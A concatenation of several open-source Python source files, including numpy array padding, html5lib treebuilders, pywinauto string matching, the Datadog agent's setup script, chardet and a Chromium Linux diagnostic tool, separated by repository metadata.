newmat = _append_ramp(newmat, pad_after, after_val, axis)
elif mode == 'maximum':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_max(newmat, pad_before, chunk_before, axis)
newmat = _append_max(newmat, pad_after, chunk_after, axis)
elif mode == 'mean':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_mean(newmat, pad_before, chunk_before, axis)
newmat = _append_mean(newmat, pad_after, chunk_after, axis)
elif mode == 'median':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_med(newmat, pad_before, chunk_before, axis)
newmat = _append_med(newmat, pad_after, chunk_after, axis)
elif mode == 'minimum':
for axis, ((pad_before, pad_after), (chunk_before, chunk_after)) \
in enumerate(zip(pad_width, kwargs['stat_length'])):
newmat = _prepend_min(newmat, pad_before, chunk_before, axis)
newmat = _append_min(newmat, pad_after, chunk_after, axis)
elif mode == 'reflect':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
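            # For example (illustrative): with newmat.shape[axis] == 3 and
            # pad_before == 7, safe_pad starts at 2, so the loop below pads
            # in chunks of 2, then 4, and the final _pad_ref call adds the
            # remaining 1, for a total of 7 prepended values.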
if ((pad_before > 0) or
(pad_after > 0)) and newmat.shape[axis] == 1:
# Extending singleton dimension for 'reflect' is legacy
# behavior; it really should raise an error.
newmat = _prepend_edge(newmat, pad_before, axis)
newmat = _append_edge(newmat, pad_after, axis)
continue
method = kwargs['reflect_type']
safe_pad = newmat.shape[axis] - 1
while ((pad_before > safe_pad) or (pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_ref(newmat, (pad_iter_b,
pad_iter_a), method, axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_ref(newmat, (pad_before, pad_after), method, axis)
elif mode == 'symmetric':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
method = kwargs['reflect_type']
safe_pad = newmat.shape[axis]
while ((pad_before > safe_pad) or
(pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_sym(newmat, (pad_iter_b,
pad_iter_a), method, axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_sym(newmat, (pad_before, pad_after), method, axis)
elif mode == 'wrap':
for axis, (pad_before, pad_after) in enumerate(pad_width):
# Recursive padding along any axis where `pad_amt` is too large
# for indexing tricks. We can only safely pad the original axis
# length, to keep the period of the reflections consistent.
safe_pad = newmat.shape[axis]
while ((pad_before > safe_pad) or
(pad_after > safe_pad)):
pad_iter_b = min(safe_pad,
safe_pad * (pad_before // safe_pad))
pad_iter_a = min(safe_pad, safe_pad * (pad_after // safe_pad))
newmat = _pad_wrap(newmat, (pad_iter_b, pad_iter_a), axis)
pad_before -= pad_iter_b
pad_after -= pad_iter_a
safe_pad += pad_iter_b + pad_iter_a
newmat = _pad_wrap(newmat, (pad_before, pad_after), axis)
return newmat
|
bsd-3-clause
|
alsotoes/vsphere-examples
|
python/.venv/lib/python2.6/site-packages/pip/_vendor/html5lib/treebuilders/__init__.py
|
1730
|
3405
|
"""A collection of modules for building different kinds of tree from
HTML documents.
To create a treebuilder for a new type of tree, you need to
implement several things:
1) A set of classes for various types of elements: Document, Doctype,
Comment, Element. These must implement the interface of
_base.treebuilders.Node (although comment nodes have a different
signature for their constructor, see treebuilders.etree.Comment)
Textual content may also be implemented as another node type, or not, as
your tree implementation requires.
2) A treebuilder object (called TreeBuilder by convention) that
inherits from treebuilders._base.TreeBuilder. This has 4 required attributes:
documentClass - the class to use for the bottommost node of a document
elementClass - the class to use for HTML Elements
commentClass - the class to use for comments
doctypeClass - the class to use for doctypes
It also has one required method:
getDocument - Returns the root node of the complete document tree
3) If you wish to run the unit tests, you must also create a
testSerializer method on your treebuilder which accepts a node and
returns a string containing Node and its children serialized according
to the format used in the unittests
"""
from __future__ import absolute_import, division, unicode_literals
from ..utils import default_etree
treeBuilderCache = {}
def getTreeBuilder(treeType, implementation=None, **kwargs):
"""Get a TreeBuilder class for various types of tree with built-in support
treeType - the name of the tree type required (case-insensitive). Supported
values are:
"dom" - A generic builder for DOM implementations, defaulting to
                an xml.dom.minidom based implementation.
"etree" - A generic builder for tree implementations exposing an
ElementTree-like interface, defaulting to
xml.etree.cElementTree if available and
xml.etree.ElementTree if not.
"lxml" - A etree-based builder for lxml.etree, handling
limitations of lxml's implementation.
implementation - (Currently applies to the "etree" and "dom" tree types). A
module implementing the tree type e.g.
xml.etree.ElementTree or xml.etree.cElementTree."""
treeType = treeType.lower()
if treeType not in treeBuilderCache:
if treeType == "dom":
from . import dom
# Come up with a sane default (pref. from the stdlib)
if implementation is None:
from xml.dom import minidom
implementation = minidom
# NEVER cache here, caching is done in the dom submodule
return dom.getDomModule(implementation, **kwargs).TreeBuilder
elif treeType == "lxml":
from . import etree_lxml
treeBuilderCache[treeType] = etree_lxml.TreeBuilder
elif treeType == "etree":
from . import etree
if implementation is None:
implementation = default_etree
# NEVER cache here, caching is done in the etree submodule
return etree.getETreeModule(implementation, **kwargs).TreeBuilder
else:
raise ValueError("""Unrecognised treebuilder "%s" """ % treeType)
return treeBuilderCache.get(treeType)
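# Example usage (an illustrative sketch, not part of this module; assumes the
# html5lib package is importable):
#
#     import html5lib
#     from html5lib.treebuilders import getTreeBuilder
#
#     TreeBuilder = getTreeBuilder("etree")
#     parser = html5lib.HTMLParser(tree=TreeBuilder)
#     document = parser.parse("<p>Hello world</p>")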
|
gpl-3.0
|
prasen-ftech/pywinauto
|
pywinauto/findbestmatch.py
|
13
|
17529
|
# GUI Application automation and testing library
# Copyright (C) 2006 Mark Mc Mahon
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public License
# as published by the Free Software Foundation; either version 2.1
# of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the
# Free Software Foundation, Inc.,
# 59 Temple Place,
# Suite 330,
# Boston, MA 02111-1307 USA
"Module to find the closest match of a string in a list"
__revision__ = "$Revision$"
import re
import difflib
import fuzzydict
#import ctypes
#import ldistance
#levenshtein_distance = ctypes.cdll.levenshtein.levenshtein_distance
#levenshtein_distance = ldistance.distance
# need to use sets.Set for python 2.3 compatibility
# but 2.6 raises a deprecation warning about sets module
try:
set
except NameError:
import sets
set = sets.Set
find_best_control_match_cutoff = .6
#====================================================================
class MatchError(IndexError):
"A suitable match could not be found"
def __init__(self, items = None, tofind = ''):
"Init the parent with the message"
self.tofind = tofind
self.items = items
if self.items is None:
self.items = []
IndexError.__init__(self,
"Could not find '%s' in '%s'"% (tofind, self.items))
_cache = {}
# given a list of texts return the match score for each
# and the best score and text with best score
#====================================================================
def _get_match_ratios(texts, match_against):
"Get the match ratio of how each item in texts compared to match_against"
    # now time to figure out the matching
ratio_calc = difflib.SequenceMatcher()
ratio_calc.set_seq1(match_against)
ratios = {}
best_ratio = 0
best_text = ''
    global _cache
for text in texts:
if 0:
pass
if (text, match_against) in _cache:
ratios[text] = _cache[(text, match_against)]
elif(match_against, text) in _cache:
ratios[text] = _cache[(match_against, text)]
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(match_against), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text] = ratio
# calculate ratio and store it
ratios[text] = ratio_calc.ratio()
_cache[(match_against, text)] = ratios[text]
# if this is the best so far then update best stats
if ratios[text] > best_ratio:
best_ratio = ratios[text]
best_text = text
return ratios, best_ratio, best_text
#====================================================================
def find_best_match(search_text, item_texts, items, limit_ratio = .5):
"""Return the item that best matches the search_text
* **search_text** The text to search for
* **item_texts** The list of texts to search through
* **items** The list of items corresponding (1 to 1)
to the list of texts to search through.
* **limit_ratio** How well the text has to match the best match.
      If the best match scores lower than this, then it is not
considered a match and a MatchError is raised, (default = .5)
"""
search_text = _cut_at_tab(search_text)
text_item_map = UniqueDict()
# Clean each item, make it unique and map to
# to the item index
for text, item in zip(item_texts, items):
text_item_map[_cut_at_tab(text)] = item
ratios, best_ratio, best_text = \
_get_match_ratios(text_item_map.keys(), search_text)
if best_ratio < limit_ratio:
raise MatchError(items = text_item_map.keys(), tofind = search_text)
return text_item_map[best_text]
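# Example (an illustrative sketch, not part of the original module):
#
#     >>> find_best_match("Cancel", ["OK", "Cancle"], ["ok_ctrl", "cancel_ctrl"])
#     'cancel_ctrl'
#
# "Cancle" scores well above the default limit_ratio of .5 against "Cancel",
# so the item corresponding to that text is returned.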
#====================================================================
_after_tab = re.compile(ur"\t.*", re.UNICODE)
_non_word_chars = re.compile(ur"\W", re.UNICODE)
def _cut_at_tab(text):
"Clean out non characters from the string and return it"
# remove anything after the first tab
return _after_tab.sub("", text)
def _clean_non_chars(text):
"Remove non word characters"
# should this also remove everything after the first tab?
# remove non alphanumeric characters
return _non_word_chars.sub("", text)
def IsAboveOrToLeft(ref_control, other_ctrl):
"Return true if the other_ctrl is above or to the left of ref_control"
text_r = other_ctrl.Rectangle()
ctrl_r = ref_control.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
return False
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
return False
# text control top left corner is below control
# top left corner - so not to the above or left :)
if text_r.top >= ctrl_r.top and text_r.left >= ctrl_r.left:
return False
return True
#====================================================================
distance_cuttoff = 999
def GetNonTextControlName(ctrl, controls):
"""return the name for this control by finding the closest
text control above and to its left"""
names = []
ctrl_index = controls.index(ctrl)
if ctrl_index != 0:
prev_ctrl = controls[ctrl_index-1]
if prev_ctrl.FriendlyClassName() == "Static" and \
prev_ctrl.IsVisible() and prev_ctrl.WindowText() and \
IsAboveOrToLeft(ctrl, prev_ctrl):
names.append(
prev_ctrl.WindowText() +
ctrl.FriendlyClassName())
# get the visible text controls so that we can get
# the closest text if the control has no text
text_ctrls = [ctrl_ for ctrl_ in controls
if ctrl_.IsVisible() and ctrl_.WindowText() and ctrl_.can_be_label]
best_name = ''
closest = distance_cuttoff
# now for each of the visible text controls
for text_ctrl in text_ctrls:
# get aliases to the control rectangles
text_r = text_ctrl.Rectangle()
ctrl_r = ctrl.Rectangle()
# skip controls where text win is to the right of ctrl
if text_r.left >= ctrl_r.right:
continue
# skip controls where text win is below ctrl
if text_r.top >= ctrl_r.bottom:
continue
# calculate the distance between the controls
        # at first I just calculated the distance from the top left
# corner of one control to the top left corner of the other control
# but this was not best, so as a text control should either be above
# or to the left of the control I get the distance between
# the top left of the non text control against the
# Top-Right of the text control (text control to the left)
# Bottom-Left of the text control (text control above)
# then I get the min of these two
# We do not actually need to calculate the difference here as we
# only need a comparative number. As long as we find the closest one
# the actual distance is not all that important to us.
        # this reduced the unit test run time on my machine by about
        # 1 second (from 61 s -> 60 s)
# (x^2 + y^2)^.5
#distance = (
# (text_r.left - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.bottom - ctrl_r.top) ** 2) \
# ** .5 # ^.5
#distance2 = (
# (text_r.right - ctrl_r.left) ** 2 + # (x^2 + y^2)
# (text_r.top - ctrl_r.top) ** 2) \
# ** .5 # ^.5
distance = abs(text_r.left - ctrl_r.left) + abs(text_r.bottom - ctrl_r.top)
distance2 = abs(text_r.right - ctrl_r.left) + abs(text_r.top - ctrl_r.top)
distance = min(distance, distance2)
        # if this distance was closer than the last one
if distance < closest:
closest = distance
best_name = text_ctrl.WindowText() + ctrl.FriendlyClassName()
names.append(best_name)
return names
#====================================================================
def get_control_names(control, allcontrols):
"Returns a list of names for this control"
names = []
# if it has a reference control - then use that
#if hasattr(control, 'ref') and control.ref:
# control = control.ref
    # Add the control based on its friendly class name
names.append(control.FriendlyClassName())
    # if it has some character text then add it based on that
    # and based on that with the friendly class name appended
cleaned = control.WindowText()
# Todo - I don't like the hardcoded classnames here!
if cleaned and control.has_title:
names.append(cleaned)
names.append(cleaned + control.FriendlyClassName())
# it didn't have visible text
else:
        # so find the text of the nearest visible text control
non_text_names = GetNonTextControlName(control, allcontrols)
# and if one was found - add it
if non_text_names:
names.extend(non_text_names)
# return the names - and make sure there are no duplicates
return set(names)
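# Example (illustrative): for a visible Button whose WindowText() is "OK"
# (and whose has_title attribute is true), this returns something like
# set(['Button', 'OK', 'OKButton']).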
#====================================================================
class UniqueDict(dict):
"A dictionary subclass that handles making it's keys unique"
def __setitem__(self, text, item):
"Set an item of the dictionary"
# this text is already in the map
# so we need to make it unique
if text in self:
# find next unique text after text1
unique_text = text
counter = 2
while unique_text in self:
unique_text = text + str(counter)
counter += 1
            # we also need to make sure the original item
            # is stored under text0 and text1 as well
if text + '0' not in self:
dict.__setitem__(self, text+'0', self[text])
dict.__setitem__(self, text+'1', self[text])
            # now that we don't need the original 'text' anymore
            # replace it with the unique text
text = unique_text
# add our current item
dict.__setitem__(self, text, item)
def FindBestMatches(
self,
search_text,
clean = False,
ignore_case = False):
"""Return the best matches for search_text in the items
* **search_text** the text to look for
* **clean** whether to clean non text characters out of the strings
* **ignore_case** compare strings case insensitively
"""
# now time to figure out the matching
ratio_calc = difflib.SequenceMatcher()
if ignore_case:
search_text = search_text.lower()
ratio_calc.set_seq1(search_text)
ratios = {}
best_ratio = 0
best_texts = []
ratio_offset = 1
if clean:
ratio_offset *= .9
if ignore_case:
ratio_offset *= .9
for text_ in self:
# make a copy of the text as we need the original later
text = text_
if clean:
text = _clean_non_chars(text)
if ignore_case:
text = text.lower()
# check if this item is in the cache - if yes, then retrieve it
if (text, search_text) in _cache:
ratios[text_] = _cache[(text, search_text)]
elif(search_text, text) in _cache:
ratios[text_] = _cache[(search_text, text)]
# not in the cache - calculate it and add it to the cache
else:
# set up the SequenceMatcher with other text
ratio_calc.set_seq2(text)
                # if a very quick check reveals that this is not going
                # to match, then skip the more expensive comparisons
ratio = ratio_calc.real_quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.quick_ratio() * ratio_offset
if ratio >= find_best_control_match_cutoff:
ratio = ratio_calc.ratio() * ratio_offset
# save the match we got and store it in the cache
ratios[text_] = ratio
_cache[(text, search_text)] = ratio
# try using the levenshtein distance instead
#lev_dist = levenshtein_distance(unicode(search_text), unicode(text))
#ratio = 1 - lev_dist / 10.0
#ratios[text_] = ratio
#print "%5s" %("%0.2f"% ratio), search_text, `text`
# if this is the best so far then update best stats
if ratios[text_] > best_ratio and \
ratios[text_] >= find_best_control_match_cutoff:
best_ratio = ratios[text_]
best_texts = [text_]
elif ratios[text_] == best_ratio:
best_texts.append(text_)
#best_ratio *= ratio_offset
return best_ratio, best_texts
#====================================================================
def build_unique_dict(controls):
"""Build the disambiguated list of controls
Separated out to a different function so that we can get
the control identifiers for printing.
"""
name_control_map = UniqueDict()
# collect all the possible names for all controls
# and build a list of them
for ctrl in controls:
ctrl_names = get_control_names(ctrl, controls)
# for each of the names
for name in ctrl_names:
name_control_map[name] = ctrl
return name_control_map
#====================================================================
def find_best_control_matches(search_text, controls):
"""Returns the control that is the the best match to search_text
This is slightly differnt from find_best_match in that it builds
up the list of text items to search through using information
from each control. So for example for there is an OK, Button
then the following are all added to the search list:
"OK", "Button", "OKButton"
But if there is a ListView (which do not have visible 'text')
then it will just add "ListView".
"""
name_control_map = build_unique_dict(controls)
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl, controls)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
search_text = unicode(search_text)
best_ratio, best_texts = name_control_map.FindBestMatches(search_text)
best_ratio_ci, best_texts_ci = \
name_control_map.FindBestMatches(search_text, ignore_case = True)
best_ratio_clean, best_texts_clean = \
name_control_map.FindBestMatches(search_text, clean = True)
best_ratio_clean_ci, best_texts_clean_ci = \
name_control_map.FindBestMatches(
search_text, clean = True, ignore_case = True)
if best_ratio_ci > best_ratio:
best_ratio = best_ratio_ci
best_texts = best_texts_ci
if best_ratio_clean > best_ratio:
best_ratio = best_ratio_clean
best_texts = best_texts_clean
if best_ratio_clean_ci > best_ratio:
best_ratio = best_ratio_clean_ci
best_texts = best_texts_clean_ci
if best_ratio < find_best_control_match_cutoff:
raise MatchError(items = name_control_map.keys(), tofind = search_text)
return [name_control_map[best_text] for best_text in best_texts]
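# Example (an illustrative sketch, not part of the original module): given a
# dialog whose controls include an "OK" Button and a ListView, something like
#
#     find_best_control_matches("OKButton", dlg_controls)
#
# would return the button, because "OKButton" is one of the names generated
# for it by get_control_names(); `dlg_controls` is a hypothetical list of
# control wrappers.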
#
#def GetControlMatchRatio(text, ctrl):
# # get the texts for the control
# ctrl_names = get_control_names(ctrl)
#
# #get the best match for these
# matcher = UniqueDict()
# for name in ctrl_names:
# matcher[name] = ctrl
#
# best_ratio, unused = matcher.FindBestMatches(text)
#
# return best_ratio
#
#
#
#def get_controls_ratios(search_text, controls):
# name_control_map = UniqueDict()
#
# # collect all the possible names for all controls
# # and build a list of them
# for ctrl in controls:
# ctrl_names = get_control_names(ctrl)
#
# # for each of the names
# for name in ctrl_names:
# name_control_map[name] = ctrl
#
# match_ratios, best_ratio, best_text = \
# _get_match_ratios(name_control_map.keys(), search_text)
#
# return match_ratios, best_ratio, best_text,
|
lgpl-2.1
|
MinerKasch/dd-agent
|
setup.py
|
7
|
5157
|
# (C) Datadog, Inc. 2010-2016
# All rights reserved
# Licensed under Simplified BSD License (see LICENSE)
# stdlib
from datetime import date
import os
import sys
# 3p
from setuptools import find_packages, setup
from requests.certs import where
# project
from config import get_version
from utils.jmx import JMX_FETCH_JAR_NAME
# Extra arguments to pass to the setup function
extra_args = {}
# Prereqs of the build. Won't get installed when deploying the egg.
setup_requires = []
# Prereqs of the install. Will install when deploying the egg.
install_requires = []
# Modified on mac
app_name = 'datadog-agent'
# plist (used only on mac)
plist = None
if sys.platform == 'win32':
from glob import glob
# noqa for flake8, these imports are probably here to force packaging of these modules
import py2exe # noqa
import pysnmp_mibs # noqa
import pyVim # noqa
import pyVmomi # noqa
# That's just a copy/paste of requirements.txt
for reqfile in ('requirements.txt', 'requirements-opt.txt'):
with open(reqfile) as f:
for line in f:
line = line.strip()
if line.startswith('#') or not line:
continue
            # we skip psycopg2 now because we don't want to install PG
            # on Windows
if 'psycopg2' in line:
continue
install_requires.append(line)
# windows-specific deps
install_requires.append('pywin32==217')
# Modules to force-include in the exe
include_modules = [
# 3p
'wmi',
'win32service',
'win32serviceutil',
'win32event',
'simplejson',
'adodbapi',
'pycurl',
'tornado.curl_httpclient',
'pymongo',
'pymysql',
'psutil',
'pg8000',
'redis',
'requests',
'pysnmp',
'pysnmp.smi.mibs.*',
'pysnmp.smi.mibs.instances.*',
'pysnmp_mibs.*',
'pysnmp.entity.rfc3413.oneliner.*',
'pyVim.*',
'pyVmomi.*',
'paramiko',
'Crypto',
'winrandom',
'uptime',
'pythoncom',
'dns.resolver',
'dns.rdtypes.ANY.*',
'dns.rdtypes.IN.*',
# agent
'checks.network_checks',
'checks.wmi_check',
'checks.libs.vmware.*',
'httplib2',
'utils.containers',
'scandir',
# pup
'tornado.websocket',
'tornado.web',
'tornado.ioloop',
]
class Target(object):
def __init__(self, **kw):
self.__dict__.update(kw)
self.version = get_version()
self.company_name = 'Datadog, Inc.'
self.copyright = 'Copyright 2013 Datadog, Inc.'
self.cmdline_style = 'pywin32'
agent_svc = Target(name='Datadog Agent', modules='win32.agent', dest_base='ddagent')
extra_args = {
'options': {
'py2exe': {
'includes': ','.join(include_modules),
'optimize': 0,
'compressed': True,
'bundle_files': 3,
'excludes': ['numpy'],
'dll_excludes': ['crypt32.dll',"IPHLPAPI.DLL", "NSI.dll", "WINNSI.DLL", "WTSAPI32.dll"],
'ascii':False,
},
},
'console': ['win32\shell.py'],
'service': [agent_svc],
'windows': [{'script': 'win32\gui.py',
'dest_base': "agent-manager",
'uac_info': "requireAdministrator", # The manager needs to be administrator to stop/start the service
'icon_resources': [(1, r"packaging\datadog-agent\win32\install_files\dd_agent_win_256.ico")],
}],
'data_files': [
("Microsoft.VC90.CRT", glob(r'C:\Python27\redist\*.*')),
('jmxfetch', [r'checks\libs\%s' % JMX_FETCH_JAR_NAME]),
('gohai', [r'gohai\gohai.exe']),
('', [where()]), # CA certificates bundled with `requests`
],
}
elif sys.platform == 'darwin':
app_name = 'Datadog Agent'
from plistlib import Plist
plist = Plist.fromFile(os.path.dirname(os.path.realpath(__file__)) + '/packaging/Info.plist')
plist.update(dict(
CFBundleGetInfoString="{0}, Copyright (c) 2009-{1}, Datadog Inc.".format(
get_version(), date.today().year),
CFBundleVersion=get_version()
))
extra_args = {
'app': ['gui.py'],
'data_files': [
'images',
'status.html',
],
'options': {
'py2app': {
'optimize': 0,
'iconfile': 'packaging/Agent.icns',
'plist': plist
}
}
}
setup(
name=app_name,
version=get_version(),
description="DevOps' best friend",
author='DataDog',
author_email='[email protected]',
url='http://www.datadoghq.com',
install_requires=install_requires,
setup_requires=setup_requires,
packages=find_packages(),
include_package_data=True,
test_suite='nose.collector',
zip_safe=False,
**extra_args
)
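# Typical invocation (illustrative, not part of the original file): on Windows
# this setup script is driven through py2exe, e.g. ``python setup.py py2exe``;
# on macOS through py2app, e.g. ``python setup.py py2app``.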
|
bsd-3-clause
|
hbhzwj/imalse
|
tools/ns-allinone-3.14.1/ns-3.14.1/src/spectrum/bindings/callbacks_list.py
|
63
|
1224
|
callback_classes = [
['void', 'ns3::Ptr<ns3::Packet>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::Packet const>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::Packet>', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['bool', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
['void', 'ns3::Ptr<ns3::NetDevice>', 'ns3::Ptr<ns3::Packet const>', 'unsigned short', 'ns3::Address const&', 'ns3::Address const&', 'ns3::NetDevice::PacketType', 'ns3::empty', 'ns3::empty', 'ns3::empty'],
]
|
gpl-3.0
|
frainfreeze/studying
|
home/python/venv/lib/python3.5/site-packages/pip/_vendor/chardet/charsetgroupprober.py
|
270
|
3787
|
######################## BEGIN LICENSE BLOCK ########################
# The Original Code is Mozilla Communicator client code.
#
# The Initial Developer of the Original Code is
# Netscape Communications Corporation.
# Portions created by the Initial Developer are Copyright (C) 1998
# the Initial Developer. All Rights Reserved.
#
# Contributor(s):
# Mark Pilgrim - port to Python
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA
# 02110-1301 USA
######################### END LICENSE BLOCK #########################
from .enums import ProbingState
from .charsetprober import CharSetProber
class CharSetGroupProber(CharSetProber):
def __init__(self, lang_filter=None):
super(CharSetGroupProber, self).__init__(lang_filter=lang_filter)
self._active_num = 0
self.probers = []
self._best_guess_prober = None
def reset(self):
super(CharSetGroupProber, self).reset()
self._active_num = 0
for prober in self.probers:
if prober:
prober.reset()
prober.active = True
self._active_num += 1
self._best_guess_prober = None
@property
def charset_name(self):
if not self._best_guess_prober:
self.get_confidence()
if not self._best_guess_prober:
return None
return self._best_guess_prober.charset_name
@property
def language(self):
if not self._best_guess_prober:
self.get_confidence()
if not self._best_guess_prober:
return None
return self._best_guess_prober.language
def feed(self, byte_str):
for prober in self.probers:
if not prober:
continue
if not prober.active:
continue
state = prober.feed(byte_str)
if not state:
continue
if state == ProbingState.FOUND_IT:
self._best_guess_prober = prober
return self.state
elif state == ProbingState.NOT_ME:
prober.active = False
self._active_num -= 1
if self._active_num <= 0:
self._state = ProbingState.NOT_ME
return self.state
return self.state
def get_confidence(self):
state = self.state
if state == ProbingState.FOUND_IT:
return 0.99
elif state == ProbingState.NOT_ME:
return 0.01
best_conf = 0.0
self._best_guess_prober = None
for prober in self.probers:
if not prober:
continue
if not prober.active:
self.logger.debug('%s not active', prober.charset_name)
continue
conf = prober.get_confidence()
self.logger.debug('%s %s confidence = %s', prober.charset_name, prober.language, conf)
if best_conf < conf:
best_conf = conf
self._best_guess_prober = prober
if not self._best_guess_prober:
return 0.0
return best_conf
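# ---------------------------------------------------------------------------
# Editor's note (not part of the upstream module): CharSetGroupProber is not
# normally used directly; concrete subclasses populate self.probers and the
# group is driven through chardet's public API. A minimal usage sketch,
# assuming the standalone `chardet` package is importable:
#
#     import chardet
#     chardet.detect(b'\xc3\xa9l\xc3\xa9phant')
#     # -> {'encoding': 'utf-8', 'confidence': ..., 'language': ''}
# ---------------------------------------------------------------------------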
|
mit
|
Evervolv/android_external_chromium_org
|
tools/diagnose-me.py
|
50
|
3016
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Diagnose some common system configuration problems on Linux, and
suggest fixes."""
import os
import subprocess
import sys
all_checks = []
def Check(name):
"""Decorator that defines a diagnostic check."""
def wrap(func):
all_checks.append((name, func))
return func
return wrap
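# Editor's illustration (hypothetical, not one of the real checks below): a new
# diagnostic is registered simply by decorating a zero-argument function with
# @Check; returning a string reports a problem, returning None means "ok".
#
#   @Check("$HOME is set")
#   def CheckHome():
#       return None if os.environ.get('HOME') else "HOME is not set.\n"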
@Check("/usr/bin/ld is not gold")
def CheckSystemLd():
proc = subprocess.Popen(['/usr/bin/ld', '-v'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if 'GNU gold' in stdout:
return ("When /usr/bin/ld is gold, system updates can silently\n"
"corrupt your graphics drivers.\n"
"Try 'sudo apt-get remove binutils-gold'.\n")
return None
@Check("random lds are not in the $PATH")
def CheckPathLd():
proc = subprocess.Popen(['which', '-a', 'ld'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
instances = stdout.split()
if len(instances) > 1:
return ("You have multiple 'ld' binaries in your $PATH:\n"
+ '\n'.join(' - ' + i for i in instances) + "\n"
"You should delete all of them but your system one.\n"
"gold is hooked into your build via gyp.\n")
return None
@Check("/usr/bin/ld doesn't point to gold")
def CheckLocalGold():
# Check /usr/bin/ld* symlinks.
for path in ('ld.bfd', 'ld'):
path = '/usr/bin/' + path
try:
target = os.readlink(path)
except OSError, e:
if e.errno == 2:
continue # No such file
if e.errno == 22:
continue # Not a symlink
raise
if '/usr/local/gold' in target:
return ("%s is a symlink into /usr/local/gold.\n"
"It's difficult to make a recommendation, because you\n"
"probably set this up yourself. But you should make\n"
"/usr/bin/ld be the standard linker, which you likely\n"
"renamed /usr/bin/ld.bfd or something like that.\n" % path)
return None
@Check("random ninja binaries are not in the $PATH")
def CheckPathNinja():
proc = subprocess.Popen(['which', 'ninja'], stdout=subprocess.PIPE)
stdout = proc.communicate()[0]
if not 'depot_tools' in stdout:
return ("The ninja binary in your path isn't from depot_tools:\n"
+ " " + stdout +
"Remove custom ninjas from your path so that the one\n"
"in depot_tools is used.\n")
return None
def RunChecks():
for name, check in all_checks:
sys.stdout.write("* Checking %s: " % name)
sys.stdout.flush()
error = check()
if not error:
print "ok"
else:
print "FAIL"
print error
if __name__ == '__main__':
RunChecks()
|
bsd-3-clause
|
groovecoder/kuma
|
kuma/users/providers/persona/views.py
|
21
|
3499
|
import requests
from django.conf import settings
from django.core.exceptions import ImproperlyConfigured
from django.http import HttpResponse, QueryDict
from django.shortcuts import redirect
from django.template import RequestContext
from django.views.decorators.http import require_POST, require_GET
from allauth.socialaccount.helpers import complete_social_login
from allauth.socialaccount.helpers import render_authentication_error
from allauth.socialaccount.models import SocialLogin
from allauth.socialaccount import app_settings, providers
from kuma.core.urlresolvers import reverse
from kuma.core.decorators import never_cache
from .provider import PersonaProvider
@never_cache
@require_GET
